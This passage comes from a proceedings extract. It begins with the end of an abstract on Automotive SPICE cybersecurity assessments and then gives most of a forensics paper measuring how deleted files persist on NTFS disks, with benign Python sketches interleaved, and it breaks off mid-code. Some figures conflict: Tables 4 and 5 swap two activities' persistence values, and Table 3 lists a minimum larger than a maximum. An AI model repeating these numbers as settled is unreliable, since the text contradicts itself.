Cybersecurity has become a serious concern in all domains with the evolution of cloud computing. It has become especially critical in the automotive industry in recent years due to the increasing integration of computer software and connectivity in modern vehicles. In this paper, we share our experience of applying the guidance in the newly published Automotive SPICE® process model appendix for Cybersecurity in real assessments of projects with Cybersecurity component development. The case study offers A-SPICE process model assessors an evaluation and extra guidance, in the form of lessons learned, tools, and best practices, on how to expand the traditional assessment techniques to cover the cybersecurity process purposes, practices, outcomes, and work products as essential inputs in Cybersecurity assessments, in line with the newly released Automotive SPICE® appendix. This leads to the following conclusions: Automotive SPICE process assessment techniques and efficiency are impacted by the newly released Automotive SPICE appendix for Cybersecurity.
Expanding the activities and tools used within a project process assessment to embrace security engineering process model aspects is feasible in both the short and long run. A Software project with Cybersecurity constraints needs to integrate a unified solution for assessments within the organization to facilitate efficiency and secure communication with minimal overhead. Future experiments on the assessment time savings need to be conducted. We believe that these experiences and suggestions need to be shared with the Automotive SPICE® community to push forward automotive cybersecurity and to improve the standard in the long run.
Factors Affecting the Persistence of Deleted Files on Digital Storage Devices
Tahir M. Khan1(B), James H. Jones Jr.2, and Alex V. Mbazirra3
1 Purdue University, West Lafayette, IN, USA
[email protected]
2 George Mason University, Fairfax, VA, USA
3 Marymount University, Arlington, VA, USA
Abstract. There is limited research addressing the factors that contribute to the persistence of deleted file contents on digital storage devices. This study presents a digital file persistence methodology applied to study the persistence of deleted files on magnetic disk drives, although the methodology could be applied to other media types as well. The experiments consisted of tracking approximately 1900 deleted files under combinations of different factors over 324 distinct experimental runs. The findings show that the persistence of deleted files depends on several factors, including the number and size of new files written to a disk by the operating system, disk-free space combined with disk fragmentation, and file type. Future work will apply this methodology to broader factors, including other devices and circumstances.
Keywords: Digital forensics · Digital file persistence · Digital file persistence factors · Deleted files
1 Introduction
Computer technology is becoming more widely adopted and used in the home and workplace. Devices enabled with the latest technology require storage of temporary or long-term files and data in a volatile or non-volatile storage medium. A volatile device, such as random-access memory (RAM), stores temporary data and loses it when power is interrupted or turned off. A non-volatile device, such as a hard disk drive, stores data that remains intact until it is deleted from the disk. Business and home users frequently create and delete files. An operating system uses a file system to manage and organize files on a storage medium. The file system is responsible for tracking allocated and unallocated sectors on a magnetic disk drive [1]. The file system divides the storage into clusters; a cluster is a fixed number of contiguous sectors of a disk volume and is the smallest logical storage unit on a hard drive. All modern file systems allocate one or more clusters to store files on a disk volume [2]. Allocated sectors are currently in use by the file system and cannot be overwritten with new data. Unallocated sectors, on the other hand, are available for writing new data as needed by the file system. When a user deletes a file from
© The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 656–673, 2023. https://doi.org/10.1007/978-3-031-28073-3_45
Factors Affecting the Persistence of Deleted Files
a magnetic disk drive, the file system marks the cluster unallocated for future use as needed, but without removing the original file data from the disk [3]. The file system simply removes the deleted file’s reference point from the containing directory, and the blocks holding the deleted file contents are now available to the system for storing other files. The file system gradually overwrites the deleted file contents, and some deleted file contents may remain intact on the disk drive for days, months, or even years if the file system does not write new data to an unallocated sector of the disk [4]. This paper discusses the factors that affect the persistence of deleted files on a magnetic disk drive. The motivation for studying the factors affecting the persistence of deleted files stems from previous work completed by Garfinkel and McCarrin [34], which inferred the presence of whole files based on residual fragments, and Jones et al. [32], which inferred past application activity from residual deleted file fragments. The [32] and [34] studies established the value of deleted file fragments, but the motivation for this study is a lack of research into how and why these fragments persist. This paper discusses a methodology for studying the persistence of deleted files on magnetic hard disks and a method for tracking sectors associated with deleted files in sequential disk images taken from a single system over time. The rest of the paper is organized as follows: Sect. 2 describes related work, Sect. 3 presents the experimental setup and design, Sect. 4 discusses the nine factors selected to investigate digital file persistence on magnetic disks, Sect. 5 describes the experimental approach and methodology, Sect. 6 presents the findings and results of this study, Sect. 7 discusses the challenges and limitations, Sect. 8 discusses the study’s conclusion, and Sect. 9 discusses the future work.
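The deletion behavior described above can be illustrated with a toy model. This is only a sketch under stated assumptions: the `ToyVolume` class, its first-fit allocation policy, and the file names are hypothetical and do not reproduce how NTFS or any real file system chooses clusters. It shows that deleting a file removes the directory entry and marks clusters unallocated, while the old contents stay in place until a later write reuses a cluster.

```python
class ToyVolume:
    """Toy model of a volume: clusters hold bytes, a directory maps names to clusters."""

    def __init__(self, cluster_count):
        self.clusters = [b""] * cluster_count    # raw cluster contents
        self.allocated = [False] * cluster_count  # allocation bitmap
        self.directory = {}                       # file name -> list of cluster indexes

    def write_file(self, name, chunks):
        """Store each chunk in the first unallocated cluster (hypothetical first-fit policy)."""
        used = []
        for chunk in chunks:
            index = self.allocated.index(False)   # raises ValueError if the volume is full
            self.clusters[index] = chunk
            self.allocated[index] = True
            used.append(index)
        self.directory[name] = used
        return used

    def delete_file(self, name):
        """Remove the directory entry and mark clusters unallocated; data is left in place."""
        freed = self.directory.pop(name)
        for index in freed:
            self.allocated[index] = False
        return freed


volume = ToyVolume(cluster_count=4)
old_clusters = volume.write_file("report.txt", [b"AAAA", b"BBBB"])
volume.delete_file("report.txt")
# Contents of the freed clusters immediately after deletion.
residue_after_delete = [volume.clusters[i] for i in old_clusters]
# A later, smaller write reuses only one of the freed clusters.
volume.write_file("new.txt", [b"CCCC"])
residue_after_write = [volume.clusters[i] for i in old_clusters]
```

In this toy run, the deleted file is fully intact right after deletion and only partly overwritten after the new write, which mirrors the gradual decay the paper studies.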
2 Related Work
Since the invention of computers, recovering deleted files has been of interest to computer users as well as those investigating computer use and misuse. In 1985, the Ontrack Computer System developed the first recovery tool, Disk Manager® [5], and since then, developers have produced many open-source and commercial tools for recovering deleted files. Deleted files can be recovered using professional forensic tools [6] and the methods described in [7–10]. Data can be recovered from solid-state drives (SSDs) if one of the conditions outlined in [11] is met: 1) The operating system has not issued the TRIM command after the file is deleted from the disk. The TRIM command informs the drive that a data block is no longer needed and can be wiped internally [12]. 2) The file system does not support the TRIM command. 3) The file system supports the TRIM command, but the command itself is disabled. Zhang [13] discusses eight factors affecting hard drive data recovery. The author describes a scenario in which recovering large deleted files spread across a large area of the disk requires extensive time to read the file contents from the disk platter. Data can be recovered from various devices, but there is limited research that explains the factors that contribute to the persistence of deleted files. Lang and Nimsger [14], in Chapter 5 of their book “Electronic Evidence and Discovery,” discuss factors influencing the recovery of deleted files. They observed factors influencing the probability of recovering deleted files, such as how the files were deleted, the amount of time passed, computer usage since the deletion, and so on. These factors have been observed but not thoroughly investigated.
T. M. Khan et al.
In Chapter 7 of their book “Forensic Discovery,” Farmer and Venema discuss the results of a 20-week experiment conducted in a controlled environment to study how long the contents of a deleted file survive on a disk. The authors recorded each data block daily to develop a timeline for when the file was deleted and overwritten. The experiment shows that half of the deleted file contents were overwritten after about 35 days. Furthermore, the deleted file contents gradually decay over time with daily user activity. However, the experimental results do not explain the factors affecting the decay of deleted files over time. Riden [15] conducted an experiment to determine how long it takes to overwrite a cluster or block in a file system. The files were deleted from a pen drive, and a set of new files was copied to it to study the persistence of the deleted files. The author concludes that file system blocks decay gradually over time. Venema stated at the fifth annual DFRWS conference [16] that “…the persistence of deleted file content is dependent on the file system, activity, and amount of free space (a complex relationship)”. In 2012, Fairbanks and Garfinkel posited several factors, published in [17], that might affect data decay for deleted files. The paper states that “in order to understand and quantify deleted data decays, one must understand file system and user behavior.” From their work, we derived the idea of studying deleted file decay rates on a magnetic disk. Jones and Khan presented results in [18] showing that the number of new files written on the disk is one of the factors affecting the persistence of deleted files. We used the differential analysis approach [19] to measure deleted files’ persistence. The differential analysis compares images of media at two points in time to derive information about changes from one image to the next, such as a new or deleted file.
In 2015, Kevin proposed a method of measuring data persistence using the Ext4 file system journal [20], which is considered an instrumented or log-based approach. This approach uses live recording or written records to track media changes. Ext4 is a journaling file system primarily used by Linux operating systems. He argues that data decay rates can be observed by continuously monitoring the Ext4 file system journal. The disk reserves a fixed-size area for the journal, where the system writes data first before the data is written to the disk. This paper extends the work of [17, 20] and introduces factors affecting the persistence of deleted files that have not yet been studied, such as disk fragmentation, file type, and file size.
3 Experimental Design
Figure 1 depicts the experimental setup and design for studying the persistence of deleted files on magnetic hard disk drives using virtual machines (VMs). The file system in the VM is unaware of the underlying physical structure, so the behavior of a VM system and a bare metal system is expected to be the same for this experiment [21]. The experimental design is a four-step process: 1) During the disk parameter adjustment phase, twelve disks were created with the disk specifications listed in Table 1. Each disk contains the operating system and application files required to run the experiment. After successfully creating each VM disk, a snapshot for each VM was created, which serves two purposes [22]. First, it preserves the VM’s state at a specific point-in-time. Second, the user can revert to the point-in-time image whenever necessary. The virtual machine preserving and archiving process section discusses the process of creating and
Fig. 1. Experimental design
preserving a VM’s state. The approach and methodology section discusses the process of tracking sectors associated with deleted files in sequential disk images taken from a single system over time. 2) During the file creation phase, new files on the system were created by copying files from an external drive, installing applications, and performing various web user activities. 3) During the file deletion phase, files created in the previous step were deleted from the system. Not all files created during the file creation phase were deleted. Only the files of interest (1917 deleted files that were common across all twelve disks) were deleted and tracked throughout the experiment’s lifecycle. 4) During the user activity phase, the user activities described in the post-user activity section were performed on each system to determine the effect of these actions on the persistence of deleted files. User activities performed on the system include rebooting, shutting down, copying files to the system, and so on. Before performing each activity, the machine was reverted to its previous state. The process was repeated until all activities outlined in Table 2 had been performed. Following completion of each user activity, the VM files were archived and converted into RAW disk images for processing. Each user activity was repeated on twelve disks, resulting in 324 runs for this study (footnote 1).
3.1 Virtual Machine Preserving and Archiving Process
The experimental design requires preserving the state of a virtual machine at a specific point-in-time. Figure 2 shows the process of preserving and archiving virtual machines. A virtual machine is composed of several files, including the virtual machine disk (VMDK), virtual machine configuration (VMX), virtual machine snapshot (VMS), virtual memory (VMEM), virtual machine suspended state (VMSS), and log files.
The VMDK file contains operating system files, user files, and application files, and it has properties similar to a physical hard disk [23]. A user creates and deletes files from the VMDK file. The machine was suspended to preserve the state of a virtual machine at a specific point in time. A snapshot was taken for each virtual machine at each phase depicted in Fig. 1, and files associated with each virtual machine described above were
Footnote 1: Twelve disks, nine user activities, and three repeated experiments (12 * 9 * 3 = 324).
Fig. 2. Virtual machine file archive and conversion process
copied to a separate folder while it was suspended. The raw disk image format is a bit-for-bit copy of the virtual machine disk [24] and is used for processing deleted files. The Quick Emulator (QEMU) utility qemu-img was used on Linux to convert the VM disk to a raw disk image using the following command [25]:
qemu-img convert -f vmdk virtual-disk.vmdk disk.img
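When many archived VM disks must be converted, the command above can be wrapped in a small script. The following is a minimal sketch, assuming `qemu-img` is installed and on the PATH; the function names are hypothetical and are not part of the authors' tooling. The `-O raw` option states the output format explicitly, although raw is also the default output format of `qemu-img convert`.

```python
import subprocess


def build_convert_command(vmdk_path, raw_path):
    """Return the qemu-img argument list that converts a VMDK disk to a raw image."""
    return ["qemu-img", "convert", "-f", "vmdk", "-O", "raw", vmdk_path, raw_path]


def convert_vmdk_to_raw(vmdk_path, raw_path):
    """Run the conversion; raises CalledProcessError if qemu-img reports a failure."""
    subprocess.run(build_convert_command(vmdk_path, raw_path), check=True)


# Building the command does not require qemu-img to be installed.
command = build_convert_command("virtual-disk.vmdk", "disk.img")
```

Passing the arguments as a list avoids shell quoting problems when disk paths contain spaces.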
4 Parameters Identification
In this study, nine factors were selected to investigate digital file persistence on magnetic disks. They were divided into three categories: disk and system, deleted files, and post-user activity profile. Each category is discussed in more detail in the sections that follow.
4.1 Disk and System Factors
Factors associated with the disk and system include the disk-free bytes (media free space), disk fragmentation, media type, and file system. The media free space is the amount of disk space available for an operating system to write new files on the disk. The disk fragmentation measures how far the deleted files are scattered on a disk. Large areas of contiguous disk-free space are available for writing new files on a low-fragmented disk. In contrast, only small areas of contiguous free space are available on a high-fragmented disk. The media type is a magnetic disk, in which data is read from and written to a disk platter. An operating system uses a file system to organize data on a system. Many file systems are used in modern operating systems, including FAT32, NTFS, EXT4, and others. The file system selected for this study is the New Technology File System (NTFS), which Microsoft Windows uses in its current operating systems. The goal of creating a unique combination of disks is to study the persistence of deleted files under varying disk conditions, as shown in Table 1. The disk-free bytes range from 4.27 gigabytes (GB) to 23.78 GB, with disk fragmentation ranging from 1% to 22%.
Table 1. Disk combinations
Disk-free bytes (GB) | Disk fragmentation (Percent)
4.27 | 16
4.28 | 3
4.28 | 22
9.72 | 13
9.73 | 20
9.74 | 1
13.09 | 3
13.11 | 12
13.12 | 21
23.78 | 3
23.78 | 14
23.78 | 21
4.2 Post-user Activity
Figure 1 shows that files of interest (1917 deleted files that were common across all twelve disks) were deleted during the file deletion phase. These files were tracked throughout the experiment’s lifecycle. Following the deletion of files from the system, nine post-user activities, summarized in Table 2, were performed to determine whether these activities affected the persistence of deleted files. Each user activity generated a distinct set of files on the system. In this experiment, each user activity was repeated three times on twelve different disks. Table 3 shows the minimum and maximum number of new files, and their total size in bytes, written to the system while performing each user activity listed in Table 2.
4.3 Deleted Files Properties
We chose several deleted file properties to investigate how they affect the persistence of deleted files, including file size, file extension, file path, non-resident, and non-fragmented. The file size is the size of the deleted file. A file extension is a suffix added to the end of a filename. In a Microsoft Windows operating system, it frequently consists of three characters identifying the file format. A file path describes the location of a file on the disk. Non-resident files have a file size above 700 bytes and are always stored outside of the Master File Table (MFT) of the Microsoft Windows operating system [26]. In a magnetic disk, a disk platter is located inside the hard disk drive (HDD) and holds the actual data [27]. A disk platter is divided into tracks and sectors. An HDD may contain multiple platters; each platter can have thousands of tracks, which are further divided into sectors. A sector is the smallest readable or writable data storage unit on an HDD.
Table 2. User activity name and description
Activity name | Activity action
Reboot | The system is rebooted one time
One-hour-reboot | The system runs for one hour without any user interaction. During this period, the system is configured to not go into sleep mode. After one hour, the user reboots the host system
Reboot-one-hour | The user reboots the system; after a successful reboot, the system runs for one hour without user intervention. While the system was running for one hour, the user performed no activities on the system. During this period, the system does not go into sleep mode
Reboot-three-times | The system was restarted three times. Following the completion of the first reboot, a second reboot was initiated, followed by a third reboot. Between reboots, we waited three minutes
Shutdown | The system is shut down
3-GB-data | The 3.04 GB (3,267,248,128 bytes) of data, which included 494 files, was copied to the system
Experiment-data | The 356 MB (374,091,776 bytes) of data, which included 2,197 files, was copied to the system
Mix-data | The 1.85 GB (1,987,305,472 bytes) of data, which included 11,466 files, was copied to the system
Web | The Mozilla Firefox web browser is used for opening multiple websites. Each website was opened in a new tab; once all websites were open, each tab was closed separately
Table 3. Total bytes each user activity writes on the system
User activity name | Minimum new files (Bytes) | Maximum new files (Bytes)
Shutdown | 3 (860228) | 14 (970572)
One-hour-reboot | 5 (9217008) | 178 (10239169)
Reboot | 7 (9357348) | 45 (10263094)
Reboot-one-hour | 10 (9350928) | 139 (84762146)
Reboot-three-times | 10 (9346207) | 49 (18777878)
3-GB-data | 530 (3267377361) | 559 (3274635355)
Web | 1010 (31141310) | 1049 (22117598)
Experiment-data | 2228 (291117530) | 2380 (374261303)
Mix-data | 12826 (1972078519) | 12892 (1979954467)
Typically, legacy HDDs have a sector size of 512 bytes, while modern drives have a sector size of 4096 bytes [28]. On a magnetic disk, the NTFS divides the storage into clusters which are a fixed number of contiguous sectors of a disk volume and are the smallest logical storage unit on a hard drive. All modern file systems allocate one or more clusters to store data on a disk volume. Non-fragmented files are stored on a disk in consecutive sectors or clusters [29].
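The relationship between sectors and clusters can be made concrete with a short calculation. This is a sketch with assumed values: the 512-byte sector and 8 sectors per cluster are illustrative choices, not parameters reported for the experimental disks, and the helper names are hypothetical.

```python
def cluster_size_bytes(sector_size, sectors_per_cluster):
    """Size of one cluster in bytes."""
    return sector_size * sectors_per_cluster


def cluster_to_sectors(cluster_number, sectors_per_cluster, first_cluster_sector=0):
    """Return the range of sector numbers covered by one cluster.

    first_cluster_sector is the sector at which cluster 0 starts
    (assumed to be 0 here, i.e. sectors are numbered from the volume start).
    """
    start = first_cluster_sector + cluster_number * sectors_per_cluster
    return range(start, start + sectors_per_cluster)


# Illustrative values only: 512-byte sectors, 8 sectors per cluster.
size = cluster_size_bytes(sector_size=512, sectors_per_cluster=8)
sectors = list(cluster_to_sectors(cluster_number=10, sectors_per_cluster=8))
```

With these assumed values a cluster is 4096 bytes, and cluster 10 covers sectors 80 through 87, so a deleted file occupying that cluster contributes eight sectors to track.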
5 Approach and Methodology
The approach and methodology used for studying the persistence of deleted files were published by Jones and Khan [18]. Figure 3 shows the process of tracking sectors associated with deleted files in sequential disk images taken from a single system over time. The virtual machine snapshots are created at each phase to preserve the state of the virtual machine disk. After successfully taking the snapshot, the virtual machine files must be archived and converted into a raw disk image for processing and tracking data in disk images. The process of archiving and converting a disk to a raw disk image is discussed in the virtual machine preserving and archiving process section.
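One simple way to picture sector tracking across sequential raw images is to compare the bytes at the same sector offsets in an earlier and a later image. The sketch below is an assumption-laden illustration, not the authors' implementation (their scripts are published in [18]): the function names, the 512-byte sector size, and the byte-for-byte comparison are all hypothetical choices, and in-memory byte strings stand in for raw image files.

```python
SECTOR_SIZE = 512  # assumed sector size for this illustration


def read_sector(image, sector_number, sector_size=SECTOR_SIZE):
    """Return the bytes of one sector from a raw image held in memory."""
    start = sector_number * sector_size
    return image[start:start + sector_size]


def persistence_percent(before, after, sectors, sector_size=SECTOR_SIZE):
    """Percentage of the given sectors whose contents are identical in both images."""
    if not sectors:
        return 0.0
    intact = sum(
        1 for s in sectors
        if read_sector(before, s, sector_size) == read_sector(after, s, sector_size)
    )
    return 100.0 * intact / len(sectors)


# Four-sector toy images: sector 2 is overwritten in the later image.
image_before = b"A" * 512 + b"B" * 512 + b"C" * 512 + b"D" * 512
image_after = b"A" * 512 + b"B" * 512 + b"X" * 512 + b"D" * 512
# Suppose a deleted file occupied sectors 1 and 2 in the earlier image.
result = persistence_percent(image_before, image_after, sectors=[1, 2])
```

A byte-for-byte comparison treats a sector rewritten with identical content as intact, which is one limitation of this simplified view.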
Fig. 3. Process of tracking deleted file in a single system
Figure 3 shows four disk images taken from a single system over time. The system time moves from left to right. At each phase, a snapshot is created to preserve the machine’s state. At system time t0, a base image named image0 is created; it contains the Microsoft Windows 10 operating system files and the applications needed to run the experiment. We used VMware Workstation version 11.1.2 build-2780323 for creating virtual machines (VMs). The disk space is allocated as fixed, and each disk is stored as a single monolithic file. At or before t0, the disk parameters of each disk are adjusted as outlined in the disk and system factors section. After adjusting disk parameters, the files of interest were created between image0 and image1. New files are created using various methods, such as copying files to the system and installing, using, and closing applications to generate unique system and log files that the operating system uses for recording and maintaining its internal operation. Files created in image1 were deleted between image1 and image2. Only the files of interest tracked in the lifecycle of the experiments were deleted. The post-user activities
outlined in Table 2 were performed separately on each disk image. To track sectors associated with deleted files, we must know which files were deleted between image1 and image2. We used the differential analysis approach to derive information about deleted files between image1 and image2. The differential image analysis approach was proposed by Garfinkel, Nelson, and Young, summarized as a data science tool by Jones [30], and used by Laamanen and Nelson [31] and others [32] for forensic artifact catalog building, and by Nelson [33] to extract software signatures from Windows Registry files. The differential analysis compares images of media at two points in time to derive information about changes from one image to the next, such as a new or deleted file. This study used this approach to identify changes to specific media sectors associated with deleted files. In the differential analysis, the deleted files are identified by comparing the allocated files in image1 and image2. We used idifference2.py (part of the DFXML package, footnote 2) to identify files deleted between image1 and image2 for each experiment shown in Fig. 3. A file is considered deleted if it is allocated in image1 and not in image2. The comparison of disk images produces a DFXML file, which includes the attributes of new, deleted, and modified files. In this research, the deleted file information is of interest; it includes the file name, file status (non-resident file), and the clusters allocated to the file in image1. We developed two Python scripts, adiff.py and trace_file.py, for processing and recording the persistence of deleted files. The implementation of these scripts is published in [18].
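The rule that a file counts as deleted when it is allocated in image1 but not in image2 can be sketched as a set difference over file listings. This is a simplified illustration and not the behavior of idifference2.py or the authors' adiff.py: the dictionaries mapping a file path to its cluster list, the paths, and the function name are hypothetical stand-ins for the parsed allocation information of each image.

```python
def deleted_files(allocated_image1, allocated_image2):
    """Return files allocated in image1 but absent from image2, with their image1 clusters."""
    return {
        path: clusters
        for path, clusters in allocated_image1.items()
        if path not in allocated_image2
    }


# Hypothetical allocation listings: file path -> clusters allocated to the file.
image1_files = {
    "Users/test/a.docx": [100, 101],
    "Users/test/b.jpg": [250],
    "Windows/system.log": [900, 901, 902],
}
image2_files = {
    "Windows/system.log": [900, 901, 902],
}

deleted = deleted_files(image1_files, image2_files)
# Clusters to follow in later images are the ones the deleted files held in image1.
clusters_to_track = sorted(c for clusters in deleted.values() for c in clusters)
```

Keeping the image1 cluster list for each deleted file is what makes later sector tracking possible, since the directory entry no longer exists in image2.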
6 Results and Analysis
All experiments were carried out in a controlled environment to investigate the persistence of deleted files on a magnetic disk drive. This study included one dependent and nine independent variables to identify patterns of overwriting deleted files in the Microsoft Windows host system. The dependent variable is the persistence of deleted files, and the nine independent variables are post-user activities, disk-free bytes (media free space), disk fragmentation, file system, new files written to disk by the operating system, deleted file size, file path, non-resident, and non-fragmented files. Multiple disk images were created with a unique combination of disk-free space and disk fragmentation to investigate deleted file persistence, as shown in Table 1. We used idifference2.py to identify files deleted between image1 and image2 for each experiment shown in Fig. 3; 1,902 files were common across all experimental runs. The same 1,902 files were created and deleted on each image using a combination of direct copy and manual delete, application installation and deletion, and native system activity. Nine post-user actions were performed on each image to investigate the factors that may influence the persistence of deleted files, including writing different sizes and numbers of files to disk as well as multiple shutdowns, reboots, and periods of no user activity (as shown in Table 2). Each experimental run was repeated three times, resulting in 324 experiments (footnote 3) tracking 1,902 files for 616,248 data records (324 * 1902).
Footnote 2: https://github.com/simsong/dfxml
Footnote 3: Twelve disks, nine user activities, and three repeated experiments (12 * 9 * 3 = 324).
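The run and record counts above follow directly from the experimental design and can be checked by enumerating the combinations. The sketch below uses the activity names from Table 2; the disk and repetition labels are arbitrary placeholders.

```python
from itertools import product

disks = range(1, 13)        # twelve disk configurations (Table 1)
activities = [              # nine post-user activities (Table 2)
    "Reboot", "One-hour-reboot", "Reboot-one-hour", "Reboot-three-times",
    "Shutdown", "3-GB-data", "Experiment-data", "Mix-data", "Web",
]
repetitions = range(1, 4)   # each run repeated three times
tracked_files = 1902        # deleted files common across all runs

# One tuple per experimental run: (disk, activity, repetition).
runs = list(product(disks, activities, repetitions))
data_records = len(runs) * tracked_files
```

Enumerating runs this way also gives a natural key, (disk, activity, repetition), under which per-file persistence records could be stored.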
6.1 User Activity and Number of Files
In this paper, a user activity is defined as a user’s action on a host system. Rebooting a system is an example of user activity. Table 4 shows the post-user activities conducted to investigate the effects on the persistence of deleted files on magnetic disks, the average number of new files created by each activity, and the deleted files that persist following each user activity. The post-user activities are discussed in the post-user activity section.
Table 4. Persistence of deleted files in various user activities
User activity name          Avg. number of new files written to a host system   Avg. final file persistence (Percent)
Shutdown (S)                7.3                                                  96.26
Reboot (R)                  22.5                                                 95.39
Reboot-three-times (RTT)    35.5                                                 94.18
One-hour-reboot (OHR)       81.4                                                 90.80
Reboot-one-hour (ROH)       55.9                                                 90.62
3-GB (3G)                   542.3                                                86.36
Web (W)                     1189.2                                               62.28
Experiment-data (ED)        2305.5                                               37.23
Mix-data (MD)               12846.4                                              12.72
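As a rough check of the trend in Table 4, the sketch below computes the overwritten share (100 minus persistence) per activity and a Spearman rank correlation between the number of new files and persistence. The rank-correlation step is an illustration added here, not part of the published analysis; only the table values come from the paper.

```python
# Values transcribed from Table 4: (activity, avg. new files, avg. persistence %).
TABLE_4 = [
    ("S", 7.3, 96.26), ("R", 22.5, 95.39), ("RTT", 35.5, 94.18),
    ("OHR", 81.4, 90.80), ("ROH", 55.9, 90.62), ("3G", 542.3, 86.36),
    ("W", 1189.2, 62.28), ("ED", 2305.5, 37.23), ("MD", 12846.4, 12.72),
]


def ranks(values):
    """Rank values from 1 (smallest) upward; assumes there are no ties."""
    order = sorted(values)
    return [order.index(v) + 1 for v in values]


def spearman_rho(xs, ys):
    """Spearman rank correlation for tie-free data."""
    n = len(xs)
    d2 = sum((rx - ry) ** 2 for rx, ry in zip(ranks(xs), ranks(ys)))
    return 1 - 6 * d2 / (n * (n * n - 1))


new_files = [row[1] for row in TABLE_4]
persistence = [row[2] for row in TABLE_4]

# Share of deleted file content that was overwritten, per activity.
overwritten = {name: round(100 - p, 2) for name, _, p in TABLE_4}
rho = spearman_rho(new_files, persistence)

print(overwritten)
print(round(rho, 3))
```

A value of rho close to -1 means the ordering by new files written is almost exactly the reverse of the ordering by persistence; the one swapped pair in the table is OHR and ROH.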
Our experiments show that the shutdown and reboot user activities generate an average of 7 to 23 new files, and writing these files to the system overwrites 4 to 5% of the deleted file contents. On the other hand, the mix-data user activity creates an average of 12,846.4 files, which overwrites approximately 87% of the deleted file contents. We measured the number of new files written during each activity shown in Table 4. In the experiment, there were 80 distinct values for the number of new files written, ranging from three files to 12,892 files per activity, and each of these values had at least 5,000 occurrences in the dataset. In Fig. 4, the x-axis represents the number of new files created by each activity, and the y-axis represents the average final file persistence, which is the average over all data records (deleted files) in the dataset. Figure 4 shows that the persistence of deleted files decreases as the operating system writes more files to the host system: as more files are written to the disk, the sectors of previously deleted files are more likely to be overwritten. The result suggests that the persistence of deleted files is affected by the number of new files written on a host system.
Fig. 4. The impact of writing different numbers of files on the disk
6.2 File Size
Table 4 shows the number of new files written but does not indicate the size of each file that the operating system writes to the disk. This section discusses the impact of the different sizes of new files created during each post-user activity to measure how these files affect the deleted files tracked in our study. Table 5 shows the post-user activities performed and the data that each activity writes to the system. When the system was shut down, for example, the experiment indicates that approximately 0.60 MB of data was generated, and files ranging in size from 0.01 MB to 0.686 MB were created, which had an impact on the persistence of deleted files. Table 5 shows that when a user performs an activity that requires minimal interaction with the system, such as restarting or shutting down the system, 90 to 96% of deleted files remain intact on the system.
Table 5. Impact of writing new files of different sizes on deleted files
User activity name          Total data size (MB)   File size range (MB)    Avg. final file persistence (Percent)
Shutdown (S)                0.60                   0.01–0.686              96.3
Reboot (R)                  9.14                   0.000002–16             95.4
Reboot-three-times (RTT)    14.59                  0.000000954–8           94.2
One-hour-reboot (OHR)       50.31                  0.000001–100            90.6
Reboot-one-hour (ROH)       31.58                  0.000002–54.44          90.8
3-GB (3G)                   3122.09                0.0000248–2724.95       86.4
Web (W)                     28.50                  0.00000191–1            62.3
Experiment-data (ED)        332.54                 0.000000954–39.92       37.2
Mix-data (MD)               1882.10                0.000000954–200         12.7
The web (W) activity writes approximately 28.50 MB of data to the system, as shown in Table 5. All files written by this activity are no larger than 1 MB. Figure 5 plots 108 distinct sizes of files, ranging from 0.00000191 MB to 1 MB. The x-axis represents the deleted file sizes, ranging from 0.00098 MB to 55 MB; the y-axis represents the average persistence of deleted files. When files no larger than 1 MB are written to the system, the results indicate that the system overwrote only deleted files smaller than 15 MB, and the remaining deleted files stayed intact on the system. This result indicates that writing a small file will possibly overwrite a similar-sized deleted file on the system.
Fig. 5. The impact of web user activity on deleted files
The 3G user activity writes approximately 3122.09 MB of data; among all user activities, this activity writes the most bytes to the system. This activity creates files ranging in size from 0.0000248 MB to 2724.95 MB, including one file of 2750 MB. Figure 6 shows that this activity overwrote deleted files that were not overwritten by the web (W) user activity. Because it writes both small and large files, it overwrote deleted files of all sizes on the system. The analysis of the web (W) and 3-GB (3G) user activities indicates that writing small-sized files will possibly use unallocated sectors previously allocated to small-sized files. Similarly, large-sized files will possibly re-use some of the unallocated sectors previously assigned to large-sized files.
Fig. 6. The impact of 3-GB user activity on deleted files
The shutdown user activity wrote the fewest new files to the host system, while the mix-data user activity wrote the most (Table 4). Correspondingly, the mix-data user activity has the lowest file persistence among all user activities, and the shutdown user activity has the highest, implying that different user activities significantly impact the persistence of deleted files.
6.3 File Types
In the dataset, three types of files were created: user files, application files, and system files. User files were created by copying files to the system, application files were created during application installation or usage, and system files were created by the operating system to track its internal activities. As noted earlier, the persistence of deleted files depends on the size of the files that the operating system writes. Figure 7 plots the persistence of file types with similar sizes. Application and user-generated files are distinguished by dot color: blue dots represent application files, and red dots represent user-generated files. There were 56 distinct file size values for application and user-generated files in the experiment; file sizes ranged from 0.00098 MB to 0.627 MB. The x-axis represents the deleted file size in MB, and the y-axis represents the average persistence of deleted files. The dataset contained only five system files, four of which were 0.00195 MB in size and one 0.00098 MB. Because the system files had only two distinct file sizes, they were excluded from our analysis; future research will examine system files. Analysis of application and user-generated files indicates that user-generated files persist longer than application-generated files, implying that the type of file impacts the persistence of deleted files.
Fig. 7. Persistence of file types
6.4 Media Free Space and Disk Fragmentation
Two properties, disk-free space and disk fragmentation, were studied to investigate how deleted files persist in varying disk conditions, and the results are shown in Table 6. Twelve disks were created, with disk-free bytes ranging from 4.27 GB to 23.78 GB and disk fragmentation ranging from 1 to 22%. Each group of disks with similar free space is analyzed separately to study the effect of disk fragmentation on deleted files. Table 6 shows that when disks have free space below 5 GB, the pairwise differences in their average file persistence range from 2.74 to 5.72 percentage points. For example, the average file persistence is 71.31% for the disk that has 4.28 GB of free space and is fragmented at 3%, and 74.05% for the disk that has 4.27 GB of free space and is fragmented at 16%; the difference between the two disks is 2.74 percentage points. For disks with free space above 5 GB, the difference in persistence is between 0.06 and 1.04 percentage points. This indicates that disk fragmentation has minimal impact on the persistence of deleted files as disk-free space increases. It is also observed that the disk fragmented at the lowest level in a group will overwrite more files than a more fragmented disk.
Table 6. Combinations of disk-free space and disk fragmentation
Disk free bytes (GB)   Disk fragmentation (Percent)   Avg. final file persistence (Percent)
4.28                   3                              71.31
4.27                   16                             74.05
4.28                   22                             77.03
9.74                   1                              74.94
9.72                   13                             75.02
9.73                   20                             74.77
13.09                  3                              72.89
13.11                  12                             73.24
13.12                  21                             73.88
23.78                  3                              72.87
23.78                  14                             73.85
23.78                  21                             73.91
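The ranges quoted for Table 6 can be reproduced from the table itself. The sketch below groups disks by rounded free space and lists the pairwise persistence gaps within each group; the grouping rule (rounding free space to the nearest gigabyte) is an assumption made here for illustration.

```python
from itertools import combinations

# (free space GB, fragmentation %, avg. final persistence %) from Table 6.
TABLE_6 = [
    (4.28, 3, 71.31), (4.27, 16, 74.05), (4.28, 22, 77.03),
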